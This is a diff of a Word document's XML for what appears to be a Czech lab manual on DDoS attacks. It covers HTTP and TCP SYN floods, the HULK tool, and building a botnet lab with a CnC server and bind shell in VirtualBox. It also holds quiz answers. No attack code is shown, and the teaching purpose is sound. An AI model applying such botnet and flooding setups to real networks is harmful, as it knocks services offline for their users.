@@ -1171,7 +1777,7 @@
       <w:pPr>
         <w:pStyle w:val="Nadpis2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc192341152"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc192867806"/>
       <w:r>
         <w:t>Úvod</w:t>
       </w:r>
@@ -1199,135 +1805,78 @@
         <w:rPr>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> procvičení základních znalostí ohledně </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
+        <w:t xml:space="preserve"> procvičení základních znalostí ohledně DDoS útocích, Command and Control serverech a specificky se zaobírá HTTP flood a TCP SYN flood útokům.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>DDoS</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> útocích, Command and Control serverech a specificky se zaobírá HTTP </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve">V průběhu práce student </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>flood</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>bude konfigurovat základní prvky pro nadstavbu scénářů</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> a TCP SYN </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
+        <w:t>, nastaví scripty pro funkčnost celého útoku jako, bind shell na CnC server a scripty pro komunikaci s botnetem.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>flood</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> útokům.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+        <w:t>Na konci této práce by student měl mít větší porozumění o těchto útocích</w:t>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:szCs w:val="28"/>
         </w:rPr>
-      </w:pPr>
+        <w:t>:</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">V průběhu práce student </w:t>
+        <w:t xml:space="preserve"> jak jejich chování funguje a co </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:szCs w:val="28"/>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>bude konfigurovat základní prvky pro nadstavbu scénářů</w:t>
-      </w:r>
-      <w:r>
+        </w:rPr>
+        <w:t xml:space="preserve">mohou způsobit. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="0" w:firstLine="0"/>
         <w:rPr>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>, nastaví scripty pro funkčnost celého útoku jako, bind shell na CnC server a scripty pro komunikaci s </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>botnetem</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Na konci této práce by student měl mít větší porozumění o těchto útocích</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> jak jejich chování funguje a co </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">mohou způsobit. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="0" w:firstLine="0"/>
-        <w:rPr>
-          <w:szCs w:val="28"/>
-        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Nadpis2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="2" w:name="_Toc192341153"/>
+      <w:bookmarkStart w:id="2" w:name="_Toc192867807"/>
       <w:r>
         <w:t>Potřebné materiály</w:t>
       </w:r>
@@ -1387,15 +1936,7 @@
         <w:t xml:space="preserve"> – software</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> pro konfiguraci routeru (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>WinBox</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>)</w:t>
+        <w:t xml:space="preserve"> pro konfiguraci routeru (WinBox)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1440,7 +1981,7 @@
       <w:pPr>
         <w:pStyle w:val="Nadpis1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc192341154"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc192867808"/>
       <w:r>
         <w:t>Teoretické informace</w:t>
       </w:r>
@@ -1455,28 +1996,15 @@
       <w:pPr>
         <w:pStyle w:val="Nadpis2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="4" w:name="_Toc192341155"/>
-      <w:r>
-        <w:t xml:space="preserve">DOS typu HTTP </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>flood</w:t>
+      <w:bookmarkStart w:id="4" w:name="_Toc192867809"/>
+      <w:r>
+        <w:t>DOS typu HTTP flood</w:t>
       </w:r>
       <w:bookmarkEnd w:id="4"/>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">HTTP </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>flood</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">HTTP flood </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">cílí </w:t>
@@ -1525,15 +2053,7 @@
         <w:t>oužívané nástroje:</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> Mezi běžné nástroje patří HULK (HTTP </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Unbearable</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Load King), který generuje unikátní HTTP požadavky v nepravidelných intervalech, což činí útok obtížně filtrovatelným.</w:t>
+        <w:t xml:space="preserve"> Mezi běžné nástroje patří HULK (HTTP Unbearable Load King), který generuje unikátní HTTP požadavky v nepravidelných intervalech, což činí útok obtížně filtrovatelným.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1553,16 +2073,11 @@
       <w:r>
         <w:t xml:space="preserve"> HTTP </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>f</w:t>
       </w:r>
       <w:r>
-        <w:t>lood</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> může dramaticky zvýšit odezvu serveru nebo jej zcela přetížit, což způsobuje výpadek poskytované služby.</w:t>
+        <w:t>lood může dramaticky zvýšit odezvu serveru nebo jej zcela přetížit, což způsobuje výpadek poskytované služby.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1712,39 +2227,7 @@
           <w:iCs/>
         </w:rPr>
         <w:tab/>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t>Wireshark</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t>Tcpdump</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t>)</w:t>
+        <w:t>(Wireshark a Tcpdump)</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -1752,44 +2235,15 @@
       <w:pPr>
         <w:pStyle w:val="Nadpis2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc192341156"/>
-      <w:r>
-        <w:t xml:space="preserve">DOS typu TCP SYN </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>flood</w:t>
+      <w:bookmarkStart w:id="5" w:name="_Toc192867810"/>
+      <w:r>
+        <w:t>DOS typu TCP SYN flood</w:t>
       </w:r>
       <w:bookmarkEnd w:id="5"/>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">TCP SYN </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Flood</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> je protokolový útok, který zneužívá slabinu v procesu navazování spojení v síťovém protokolu TCP (tzv. „</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>three-way</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>handshake</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>“). Tento útok operuje na transportní vrstvě (4. vrstva OSI modelu).</w:t>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>TCP SYN Flood je protokolový útok, který zneužívá slabinu v procesu navazování spojení v síťovém protokolu TCP (tzv. „three-way handshake“). Tento útok operuje na transportní vrstvě (4. vrstva OSI modelu).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1864,15 +2318,7 @@
         <w:t xml:space="preserve">: </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">Na jaké vrstvě ISO/OSI běží TCP SYN </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>flood</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>?</w:t>
+        <w:t>Na jaké vrstvě ISO/OSI běží TCP SYN flood?</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1958,31 +2404,7 @@
         <w:t>t.6</w:t>
       </w:r>
       <w:r>
-        <w:t>: Co se stane v normálním „</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>three</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>way</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>handshake</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">“ protokolu </w:t>
+        <w:t xml:space="preserve">: Co se stane v normálním „three way handshake“ protokolu </w:t>
       </w:r>
       <w:r>
         <w:t>po poslání značky</w:t>
@@ -2022,23 +2444,7 @@
           <w:i/>
           <w:iCs/>
         </w:rPr>
-        <w:t xml:space="preserve">Po vypršení </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t>timeru</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> se pošle ACK znova)</w:t>
+        <w:t>Po vypršení timeru se pošle ACK znova)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2050,7 +2456,7 @@
       <w:pPr>
         <w:pStyle w:val="Nadpis1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_Toc192341157"/>
+      <w:bookmarkStart w:id="6" w:name="_Toc192867811"/>
       <w:r>
         <w:t>Instrukce</w:t>
       </w:r>
@@ -2060,7 +2466,7 @@
       <w:pPr>
         <w:pStyle w:val="Nadpis2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_Toc192341159"/>
+      <w:bookmarkStart w:id="7" w:name="_Toc192867812"/>
       <w:r>
         <w:t xml:space="preserve">Část </w:t>
       </w:r>
@@ -2237,15 +2643,7 @@
         <w:t>Otázka 1.1:</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> Na základě topologie a jejích popiscích, jaký je maximální počet </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>botů</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> v botnetu, pokud </w:t>
+        <w:t xml:space="preserve"> Na základě topologie a jejích popiscích, jaký je maximální počet botů v botnetu, pokud </w:t>
       </w:r>
       <w:r>
         <w:t>první bot dostane adresu 192.1.1.11?</w:t>
@@ -2279,46 +2677,42 @@
           <w:i/>
           <w:iCs/>
         </w:rPr>
-        <w:t xml:space="preserve">Celkem jich může být 244, protože </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
+        <w:t xml:space="preserve">Celkem jich může být 244, protože 256 </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
         </w:rPr>
-        <w:t>256 – 2</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>mínus</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
         </w:rPr>
-        <w:t xml:space="preserve"> (adresa sítě a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve"> 2 (adresa sítě a broadcast) </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
         </w:rPr>
-        <w:t>broadcast</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>mínus</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
         </w:rPr>
-        <w:t>) – 10 (prvních 10 použitelných adres pokud začínáme na 192.1.1.11))</w:t>
+        <w:t xml:space="preserve"> 10 (prvních 10 použitelných adres pokud začínáme na 192.1.1.11))</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Nadpis2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc192341160"/>
+      <w:bookmarkStart w:id="8" w:name="_Toc192867813"/>
       <w:r>
         <w:t xml:space="preserve">Část </w:t>
       </w:r>
@@ -2326,16 +2720,25 @@
         <w:t>1</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">,5. </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Replikace</w:t>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> –</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>pokračování – replikace</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> topologie (</w:t>
       </w:r>
       <w:r>
-        <w:t>Jen zajímavost</w:t>
+        <w:t>j</w:t>
+      </w:r>
+      <w:r>
+        <w:t>en zajímavost</w:t>
       </w:r>
       <w:r>
         <w:t>)</w:t>
@@ -2351,7 +2754,7 @@
       <w:pPr>
         <w:pStyle w:val="Nadpis3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="9" w:name="_Toc192341161"/>
+      <w:bookmarkStart w:id="9" w:name="_Toc192867814"/>
       <w:r>
         <w:t xml:space="preserve">Krok 1. </w:t>
       </w:r>
@@ -2432,51 +2835,19 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Vyplňte všechny potřebné informace jako jméno, místo staženého .</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>iso</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> souboru a ve položce hardware zvolte 10GB místa (v budoucnu budeme dělat co nejvíce propojených klonů pro co největší ušetření místa).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Každý stroj by měl už tedy jít spustit. (defaultní jméno/heslo pro </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>kali</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> je </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>kali</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>kali</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>, pro RouterOS není nastavené žádné a pro Ubuntu při instalačce si nastavíte vlastní (doporučuji nějaké krátké a lehce zapamatovatelné)).</w:t>
+        <w:t>Vyplňte všechny potřebné informace jako jméno, místo staženého .iso souboru a ve položce hardware zvolte 10GB místa (v budoucnu budeme dělat co nejvíce propojených klonů pro co největší ušetření místa).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Každý stroj by měl už tedy jít spustit. (defaultní jméno/heslo pro kali je kali/kali, pro RouterOS není nastavené žádné a pro Ubuntu při instalačce si nastavíte vlastní (doporučuji nějaké krátké a lehce zapamatovatelné)).</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Nadpis3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="10" w:name="_Toc192341162"/>
+      <w:bookmarkStart w:id="10" w:name="_Toc192867815"/>
       <w:r>
         <w:t xml:space="preserve">Krok 2. </w:t>
       </w:r>
@@ -2549,23 +2920,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Pro nastavení páté síťové karty musíme zadat do našeho terminálu tento command (nejlépe v umístění </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>VirualBoxu</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> (defaultně ve C:\Program </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Files</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>\Oracle\VirtualBox\)):</w:t>
+        <w:t>Pro nastavení páté síťové karty musíme zadat do našeho terminálu tento command (nejlépe v umístění VirualBoxu (defaultně ve C:\Program Files\Oracle\VirtualBox\)):</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2577,32 +2932,11 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">.\VBoxManage.exe </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>modifyvm</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>“&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">Jméno R1 routeru&gt;“ </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">--nic5 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>none</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve">.\VBoxManage.exe modifyvm “&lt;Jméno R1 routeru&gt;“ </w:t>
+      </w:r>
+      <w:r>
+        <w:t>--nic5 none</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2616,7 +2950,7 @@
       <w:pPr>
         <w:pStyle w:val="Nadpis3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="11" w:name="_Toc192341163"/>
+      <w:bookmarkStart w:id="11" w:name="_Toc192867816"/>
       <w:r>
         <w:t>Krok 3. Komunikace (routery)</w:t>
       </w:r>
@@ -2624,15 +2958,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Po spuštění RouterOS, který bude naším „hlavním“ routerem, se vám ukáže CLI rozhraní. Buď můžete konfigurovat přes to, nebo se k němu připojíme přes </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>WinBox</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> (dostupný z: </w:t>
+        <w:t xml:space="preserve">Po spuštění RouterOS, který bude naším „hlavním“ routerem, se vám ukáže CLI rozhraní. Buď můžete konfigurovat přes to, nebo se k němu připojíme přes WinBox (dostupný z: </w:t>
       </w:r>
       <w:hyperlink r:id="rId18" w:history="1">
         <w:r>
@@ -2653,15 +2979,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Ve IP -&gt; DHCP </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>client</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> vytvoříme základního klienta (stačí dát rozhraní, které slouží jako síťový most (pokud si nejste jistí můžete se kouknout do kolonky Interfaces a kde bude provoz, to je síťový most))</w:t>
+        <w:t>Ve IP -&gt; DHCP client vytvoříme základního klienta (stačí dát rozhraní, které slouží jako síťový most (pokud si nejste jistí můžete se kouknout do kolonky Interfaces a kde bude provoz, to je síťový most))</w:t>
       </w:r>
       <w:r>
         <w:t>.</w:t>
@@ -2669,15 +2987,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Ve IP -&gt; </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Addresses</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> vytvoříme adresy podle schématu</w:t>
+        <w:t>Ve IP -&gt; Addresses vytvoříme adresy podle schématu</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2729,15 +3039,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Ve IP -&gt; </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>routes</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> nastavíme routy do vzdálených sítí (ze schématu je vidět, že vzdálená sítě budou pro nás jenom sítě serverů a botnetu</w:t>
+        <w:t>Ve IP -&gt; routes nastavíme routy do vzdálených sítí (ze schématu je vidět, že vzdálená sítě budou pro nás jenom sítě serverů a botnetu</w:t>
       </w:r>
       <w:r>
         <w:t>).</w:t>
@@ -2795,90 +3097,42 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Ve vytváření nás zajímají jen 3 pole. Ve General pole </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Chain</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">, který bude </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>srcnat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">. Out. Interface, který je náš síťový most. A v </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Action</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> zvolíme </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>masquerade</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>Ve vytváření nás zajímají jen 3 pole. Ve General pole Chain, který bude srcnat. Out. Interface, který je náš síťový most. A v Action zvolíme masquerade.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Pro další dva routery zvolíme ubuntu, protože zdarma verze RouterOS má limit na tx 1Mb/s.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Ještě </w:t>
+      </w:r>
+      <w:r>
+        <w:t>předtím,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> než naklonujeme ubuntu, tak </w:t>
+      </w:r>
+      <w:r>
+        <w:t>na naše základní přidáme síťový most abychom měli rychlou konektivitu do internetu a nainstalujeme na něj nástroj nmtui pro konfiguraci síťových parametrů (budeme využívat i u koncových zařízení).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Poté můžeme naklonovat a upravit síťové karty</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> ve VB</w:t>
+      </w:r>
       <w:r>
         <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Pro další dva routery zvolíme ubuntu, protože zdarma verze RouterOS má limit na </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tx</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> 1Mb/s.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Ještě </w:t>
-      </w:r>
-      <w:r>
-        <w:t>předtím,</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> než naklonujeme ubuntu, tak </w:t>
-      </w:r>
-      <w:r>
-        <w:t>na naše základní přidáme síťový most abychom měli rychlou konektivitu do internetu a nainstalujeme na něj nástroj nmtui pro konfiguraci síťových parametrů (budeme využívat i u koncových zařízení).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Poté můžeme naklonovat a upravit síťové karty</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> ve VB</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Po spuštění nmtui dáme </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>add</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> connection a přidáme potřebné rozhraní. Např.: u routeru R2 budou rozhraní vypadat následovně:</w:t>
+        <w:t>Po spuštění nmtui dáme add connection a přidáme potřebné rozhraní. Např.: u routeru R2 budou rozhraní vypadat následovně:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3073,7 +3327,7 @@
       <w:pPr>
         <w:pStyle w:val="Nadpis2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="12" w:name="_Toc192341164"/>
+      <w:bookmarkStart w:id="12" w:name="_Toc192867817"/>
       <w:r>
         <w:t xml:space="preserve">Část </w:t>
       </w:r>
@@ -3081,56 +3335,37 @@
         <w:t>2</w:t>
       </w:r>
       <w:r>
-        <w:t>.</w:t>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Příprava </w:t>
+      </w:r>
+      <w:r>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:t>cénářů</w:t>
       </w:r>
       <w:bookmarkEnd w:id="12"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Příprava Scénářů</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Nadpis3"/>
       </w:pPr>
+      <w:bookmarkStart w:id="13" w:name="_Toc192867818"/>
       <w:r>
